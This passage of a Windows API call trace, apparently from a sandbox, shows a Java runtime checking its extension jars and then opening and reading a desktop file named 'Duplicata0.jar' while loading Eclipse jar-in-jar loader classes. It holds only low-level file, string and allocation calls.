lpNumberOfBytesRead=0x4bd5ac*=0x3d9, lpOverlapped=0x0) returned 1 [0018.043] strlen (_Str="sun/nio/cs/ThreadLocalCoders$2.class") returned 0x24 [0018.043] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x338da4a, lpNewFilePointer=0x0, dwMoveMethod=0x4bdffc | out: lpNewFilePointer=0x0) returned 1 [0018.043] ReadFile (in: hFile=0xd4, lpBuffer=0xacaec0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bdfcc, lpOverlapped=0x0 | out: lpBuffer=0xacaec0*, lpNumberOfBytesRead=0x4bdfcc*=0xa0, lpOverlapped=0x0) returned 1 [0018.043] strlen (_Str="sun/nio/cs/ThreadLocalCoders$2.class") returned 0x24 [0018.043] strcpy (in: _Dest=0x4be100, _Source="sun/nio/cs/ThreadLocalCoders$2.class" | out: _Dest="sun/nio/cs/ThreadLocalCoders$2.class") returned="sun/nio/cs/ThreadLocalCoders$2.class" [0018.043] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25c0b16, lpNewFilePointer=0x0, dwMoveMethod=0x4bdc00 | out: lpNewFilePointer=0x0) returned 1 [0018.043] ReadFile (in: hFile=0xd4, lpBuffer=0x4bdc38, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bdbd0, lpOverlapped=0x0 | out: lpBuffer=0x4bdc38*, lpNumberOfBytesRead=0x4bdbd0*=0x1e, lpOverlapped=0x0) returned 1 [0018.043] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x25c0b58, lpNewFilePointer=0x0, dwMoveMethod=0x4bdc3c | out: lpNewFilePointer=0x0) returned 1 [0018.043] ReadFile (in: hFile=0xd4, lpBuffer=0xb3f958, nNumberOfBytesToRead=0x46c, lpNumberOfBytesRead=0x4bdc0c, lpOverlapped=0x0 | out: lpBuffer=0xb3f958*, lpNumberOfBytesRead=0x4bdc0c*=0x46c, lpOverlapped=0x0) returned 1 [0018.048] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned 0x3b [0018.048] wcscpy (in: _Dest=0xb5f5a0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar" [0018.048] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar", nBufferLength=0x9, lpBuffer=0x4bec70, lpFilePart=0x4bec6c | out: lpBuffer="", lpFilePart=0x4bec6c) returned 0x3c [0018.048] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\access-bridge.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec60 | out: lpFileInformation=0x4bec60) returned 1 [0018.050] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar") returned 0x36 [0018.050] wcscpy (in: _Dest=0xaab958, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar" [0018.051] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar", nBufferLength=0x9, lpBuffer=0x4bec70, lpFilePart=0x4bec6c | out: lpBuffer="", lpFilePart=0x4bec6c) returned 0x37 [0018.051] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\cldrdata.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec60 | out: lpFileInformation=0x4bec60) returned 1 [0018.052] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar") returned 0x33 [0018.052] wcscpy (in: _Dest=0xb5f5a0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar" [0018.052] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar", nBufferLength=0x9, lpBuffer=0x4bec70, lpFilePart=0x4bec6c | out: lpBuffer="", lpFilePart=0x4bec6c) returned 0x34 [0018.052] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\dnsns.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec60 | out: lpFileInformation=0x4bec60) returned 1 [0018.054] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar") returned 0x35 [0018.054] wcscpy (in: _Dest=0xaab958, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar" [0018.054] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar", nBufferLength=0x9, lpBuffer=0x4bec70, lpFilePart=0x4bec6c | out: lpBuffer="", lpFilePart=0x4bec6c) returned 0x36 [0018.054] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jaccess.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec60 | out: lpFileInformation=0x4bec60) returned 1 [0018.055] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar") returned 0x33 [0018.055] wcscpy (in: _Dest=0xb5f5a0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar" [0018.055] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar", nBufferLength=0x9, lpBuffer=0x4bec70, lpFilePart=0x4bec6c | out: lpBuffer="", lpFilePart=0x4bec6c) returned 0x34 [0018.055] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\jfxrt.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec60 | out: lpFileInformation=0x4bec60) returned 1 [0018.057] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar") returned 0x38 [0018.057] wcscpy (in: _Dest=0xb5f5a0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar" [0018.057] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar", nBufferLength=0x9, lpBuffer=0x4bec70, lpFilePart=0x4bec6c | out: lpBuffer="", lpFilePart=0x4bec6c) returned 0x39 [0018.057] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\localedata.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec60 | out: lpFileInformation=0x4bec60) returned 1 [0018.061] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar") returned 0x35 [0018.061] wcscpy (in: _Dest=0xb5f5a0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar" [0018.061] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar", nBufferLength=0x9, lpBuffer=0x4bec70, lpFilePart=0x4bec6c | out: lpBuffer="", lpFilePart=0x4bec6c) returned 0x36 [0018.062] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\nashorn.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec60 | out: lpFileInformation=0x4bec60) returned 1 [0018.063] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar") returned 0x33 [0018.063] wcscpy (in: _Dest=0xb77e98, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar" [0018.063] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar", nBufferLength=0x9, lpBuffer=0x4bec70, lpFilePart=0x4bec6c | out: lpBuffer="", lpFilePart=0x4bec6c) returned 0x34 [0018.063] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunec.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec60 | out: lpFileInformation=0x4bec60) returned 1 [0018.065] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar") returned 0x3d [0018.065] wcscpy (in: _Dest=0xb77e98, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar" [0018.065] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar", nBufferLength=0x9, lpBuffer=0x4bec70, lpFilePart=0x4bec6c | out: lpBuffer="", lpFilePart=0x4bec6c) returned 0x3e [0018.065] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunjce_provider.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec60 | out: lpFileInformation=0x4bec60) returned 1 [0018.066] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar") returned 0x37 [0018.066] wcscpy (in: _Dest=0xb5f5a0, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar" [0018.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar", nBufferLength=0x9, lpBuffer=0x4bec70, lpFilePart=0x4bec6c | out: lpBuffer="", lpFilePart=0x4bec6c) returned 0x38 [0018.066] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunmscapi.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec60 | out: lpFileInformation=0x4bec60) returned 1 [0018.069] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar") returned 0x37 [0018.069] wcscpy (in: _Dest=0xb77e98, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar" [0018.069] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar", nBufferLength=0x9, lpBuffer=0x4bec70, lpFilePart=0x4bec6c | out: lpBuffer="", lpFilePart=0x4bec6c) returned 0x38 [0018.069] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\sunpkcs11.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec60 | out: lpFileInformation=0x4bec60) returned 1 [0018.078] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar") returned 0x33 [0018.078] wcscpy (in: _Dest=0x15008620, _Source="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar") returned="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar" [0018.078] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar", nBufferLength=0x9, lpBuffer=0x4bec70, lpFilePart=0x4bec6c | out: lpBuffer="", lpFilePart=0x4bec6c) returned 0x34 [0018.078] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\ext\\zipfs.jar", fInfoLevelId=0x0, lpFileInformation=0x4bec60 | out: lpFileInformation=0x4bec60) returned 1 [0018.082] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0018.082] wcscpy (in: _Dest=0xb6b7c0, _Source="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" | out: _Dest="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0018.082] GetFullPathNameW (in: lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", nBufferLength=0x9, lpBuffer=0x4be780, lpFilePart=0x4be77c | out: lpBuffer="", lpFilePart=0x4be77c) returned 0x2b [0018.082] GetFileAttributesExW (in: lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", fInfoLevelId=0x0, lpFileInformation=0x4be770 | out: lpFileInformation=0x4be770) returned 1 [0018.082] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0018.082] wcscpy (in: _Dest=0xb6b7c0, _Source="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" | out: _Dest="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0018.083] CreateFileW (lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" (normalized: "c:\\users\\dssdpmx042\\desktop\\duplicata0.jar"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x1c4 [0018.083] GetFileTime (in: hFile=0x1c4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x4be6e0 | out: lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x4be6e0*(dwLowDateTime=0x6a1d3200, dwHighDateTime=0x1d20216)) returned 1 [0018.083] CloseHandle (hObject=0x1c4) returned 1 [0018.083] _errno () returned 0xc1e118 [0018.083] strlen (_Str="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0018.083] strcpy (in: _Dest=0x4be2d4, _Source="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" | out: _Dest="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0018.083] strcmp (_Str1="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar", _Str2="C:\\Program Files\\Java\\jre1.8.0_92\\lib\\rt.jar") returned 1 [0018.083] wcslen (_String="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned 0x2a [0018.083] wcscpy (in: _Dest=0xb6b7c0, _Source="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" | out: _Dest="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar") returned="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" [0018.083] CreateFileW (lpFileName="C:\\Users\\DSsDPMx042\\Desktop\\Duplicata0.jar" (normalized: "c:\\users\\dssdpmx042\\desktop\\duplicata0.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c4 [0018.084] calloc (_Count=0x1, _Size=0x78) returned 0x150085b0 [0018.084] ReadFile (in: hFile=0x1c4, lpBuffer=0x4be5c8, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x4be57c, lpOverlapped=0x0 | out: lpBuffer=0x4be5c8*, lpNumberOfBytesRead=0x4be57c*=0x4, lpOverlapped=0x0) returned 1 [0018.084] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x4be5ac | out: lpNewFilePointer=0x0) returned 1 [0018.084] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6d5b, lpNewFilePointer=0x0, dwMoveMethod=0x4be454 | out: lpNewFilePointer=0x0) returned 1 [0018.084] ReadFile (in: hFile=0x1c4, lpBuffer=0x4be4d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x4be424, lpOverlapped=0x0 | out: lpBuffer=0x4be4d4*, lpNumberOfBytesRead=0x4be424*=0x80, lpOverlapped=0x0) returned 1 [0018.084] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6921, lpNewFilePointer=0x0, dwMoveMethod=0x4be454 | out: lpNewFilePointer=0x0) returned 1 [0018.084] ReadFile (in: hFile=0x1c4, lpBuffer=0x15008630, nNumberOfBytesToRead=0x4a4, lpNumberOfBytesRead=0x4be424, lpOverlapped=0x0 | out: lpBuffer=0x15008630*, lpNumberOfBytesRead=0x4be424*=0x4a4, lpOverlapped=0x0) returned 1 [0018.084] calloc (_Count=0xe, _Size=0x10) returned 0x15008ae0 [0018.084] calloc (_Count=0x2, _Size=0x4) returned 0xaa87a0 [0018.090] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6921, lpNewFilePointer=0x0, dwMoveMethod=0x4beb88 | out: lpNewFilePointer=0x0) returned 1 [0018.090] ReadFile (in: hFile=0x1c4, lpBuffer=0xacaec0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4beb58, lpOverlapped=0x0 | out: lpBuffer=0xacaec0*, lpNumberOfBytesRead=0x4beb58*=0xa0, lpOverlapped=0x0) returned 1 [0018.090] calloc (_Count=0x1, _Size=0x38) returned 0xb36ef0 [0018.091] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x4bce4c | out: lpNewFilePointer=0x0) returned 1 [0018.091] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bce84, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bce1c, lpOverlapped=0x0 | out: lpBuffer=0x4bce84*, lpNumberOfBytesRead=0x4bce1c*=0x1e, lpOverlapped=0x0) returned 1 [0018.091] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x36, lpNewFilePointer=0x0, dwMoveMethod=0x4bce88 | out: lpNewFilePointer=0x0) returned 1 [0018.091] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bcf04, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x4bce58, lpOverlapped=0x0 | out: lpBuffer=0x4bcf04*, lpNumberOfBytesRead=0x4bce58*=0x7b, lpOverlapped=0x0) returned 1 [0018.093] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x36, lpNewFilePointer=0x0, dwMoveMethod=0x4bceb8 | out: lpNewFilePointer=0x0) returned 1 [0018.093] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bcf34, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x4bce88, lpOverlapped=0x0 | out: lpBuffer=0x4bcf34*, lpNumberOfBytesRead=0x4bce88*=0x7b, lpOverlapped=0x0) returned 1 [0018.098] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6b8c, lpNewFilePointer=0x0, dwMoveMethod=0x4becd8 | out: lpNewFilePointer=0x0) returned 1 [0018.098] ReadFile (in: hFile=0x1c4, lpBuffer=0xacaec0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4beca8, lpOverlapped=0x0 | out: lpBuffer=0xacaec0*, lpNumberOfBytesRead=0x4beca8*=0xa0, lpOverlapped=0x0) returned 1 [0018.107] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6921, lpNewFilePointer=0x0, dwMoveMethod=0x4bebc8 | out: lpNewFilePointer=0x0) returned 1 [0018.107] ReadFile (in: hFile=0x1c4, lpBuffer=0xacaec0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4beb98, lpOverlapped=0x0 | out: lpBuffer=0xacaec0*, lpNumberOfBytesRead=0x4beb98*=0xa0, lpOverlapped=0x0) returned 1 [0018.112] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x4bce4c | out: lpNewFilePointer=0x0) returned 1 [0018.112] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bce84, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bce1c, lpOverlapped=0x0 | out: lpBuffer=0x4bce84*, lpNumberOfBytesRead=0x4bce1c*=0x1e, lpOverlapped=0x0) returned 1 [0018.112] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x36, lpNewFilePointer=0x0, dwMoveMethod=0x4bce88 | out: lpNewFilePointer=0x0) returned 1 [0018.112] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bcf04, nNumberOfBytesToRead=0x7b, lpNumberOfBytesRead=0x4bce58, lpOverlapped=0x0 | out: lpBuffer=0x4bcf04*, lpNumberOfBytesRead=0x4bce58*=0x7b, lpOverlapped=0x0) returned 1 [0018.114] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x6b8c, lpNewFilePointer=0x0, dwMoveMethod=0x4bec58 | out: lpNewFilePointer=0x0) returned 1 [0018.114] ReadFile (in: hFile=0x1c4, lpBuffer=0xacaec0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x4bec28, lpOverlapped=0x0 | out: lpBuffer=0xacaec0*, lpNumberOfBytesRead=0x4bec28*=0xa0, lpOverlapped=0x0) returned 1 [0018.115] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x61b, lpNewFilePointer=0x0, dwMoveMethod=0x4bcf9c | out: lpNewFilePointer=0x0) returned 1 [0018.115] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bcfd4, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bcf6c, lpOverlapped=0x0 | out: lpBuffer=0x4bcfd4*, lpNumberOfBytesRead=0x4bcf6c*=0x1e, lpOverlapped=0x0) returned 1 [0018.115] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x674, lpNewFilePointer=0x0, dwMoveMethod=0x4bcfd8 | out: lpNewFilePointer=0x0) returned 1 [0018.115] ReadFile (in: hFile=0x1c4, lpBuffer=0x4bd054, nNumberOfBytesToRead=0x923, lpNumberOfBytesRead=0x4bcfa8, lpOverlapped=0x0 | out: lpBuffer=0x4bd054*, lpNumberOfBytesRead=0x4bcfa8*=0x923, lpOverlapped=0x0) returned 1 [0018.142] strlen (_Str="java/lang/Object") returned 0x10 [0018.147] calloc (_Count=0x100, _Size=0x4) returned 0xb99680 [0018.147] calloc (_Count=0x1f7, _Size=0x2) returned 0xb99a88 [0018.147] calloc (_Count=0x100, _Size=0x14) returned 0xb99e80 [0018.148] strlen (_Str="java/lang/Object") returned 0x10 [0018.148] strcpy (in: _Dest=0xb5ef40, _Source="java/lang/Object" | out: _Dest="java/lang/Object") returned="java/lang/Object" [0018.148] strlen (_Str="java/lang/String") returned 0x10 [0018.148] strcpy (in: _Dest=0xb5ef60, _Source="java/lang/String" | out: _Dest="java/lang/String") returned="java/lang/String" [0018.148] strlen (_Str="java/lang/Throwable") returned 0x13 [0018.148] strcpy (in: _Dest=0xb5ef80, _Source="java/lang/Throwable" | out: _Dest="java/lang/Throwable") returned="java/lang/Throwable" [0018.148] strlen (_Str="java/lang/Cloneable") returned 0x13 [0018.148] strcpy (in: _Dest=0xb5efa0, _Source="java/lang/Cloneable" | out: _Dest="java/lang/Cloneable") returned="java/lang/Cloneable" [0018.148] strlen (_Str="java/io/Serializable") returned 0x14 [0018.148] strcpy (in: _Dest=0xb5efc0, _Source="java/io/Serializable" | out: _Dest="java/io/Serializable") returned="java/io/Serializable" [0018.148] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader") returned 0x35 [0018.148] strcpy (in: _Dest=0x15008bc8, _Source="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader" | out: _Dest="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader") returned="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader" [0018.148] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.149] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.149] strcmp (_Str1="getManifestInfo", _Str2="") returned 1 [0018.149] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader") returned 0 [0018.150] strcmp (_Str1="currentThread", _Str2="") returned 1 [0018.150] strlen (_Str="java/lang/Thread") returned 0x10 [0018.150] strcpy (in: _Dest=0xb5efe0, _Source="java/lang/Thread" | out: _Dest="java/lang/Thread") returned="java/lang/Thread" [0018.150] strcmp (_Str1="getContextClassLoader", _Str2="") returned 1 [0018.150] strcmp (_Str1="java/lang/Thread", _Str2="java/lang/Thread") returned 0 [0018.150] strcmp (_Str1="java/lang/Thread", _Str2="java/lang/Thread") returned 0 [0018.150] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0x43 [0018.150] strcpy (in: _Dest=0x15011eb0, _Source="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory" | out: _Dest="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory" [0018.150] strcmp (_Str1="", _Str2="") returned 0 [0018.150] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0 [0018.150] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory", _Str2="org/eclipse/jdt/internal/jarinjarloader/RsrcURLStreamHandlerFactory") returned 0 [0018.150] strcmp (_Str1="setURLStreamHandlerFactory", _Str2="") returned 1 [0018.151] strlen (_Str="java/net/URL") returned 0xc [0018.151] strcpy (in: _Dest=0xb68080, _Source="java/net/URL" | out: _Dest="java/net/URL") returned="java/net/URL" [0018.151] strlen (_Str="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0x42 [0018.151] strcpy (in: _Dest=0x15011f00, _Source="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo" | out: _Dest="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo" [0018.151] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.151] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.151] strcmp (_Str1="endsWith", _Str2="") returned 1 [0018.152] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.152] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.152] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.152] strlen (_Str="java/lang/StringBuffer") returned 0x16 [0018.152] strcpy (in: _Dest=0xb5f000, _Source="java/lang/StringBuffer" | out: _Dest="java/lang/StringBuffer") returned="java/lang/StringBuffer" [0018.152] strcmp (_Str1="", _Str2="") returned 0 [0018.152] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.152] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.152] strcmp (_Str1="append", _Str2="") returned 1 [0018.152] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.153] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.153] strcmp (_Str1="toString", _Str2="") returned 1 [0018.153] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.153] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.153] strcmp (_Str1="", _Str2="") returned 0 [0018.153] 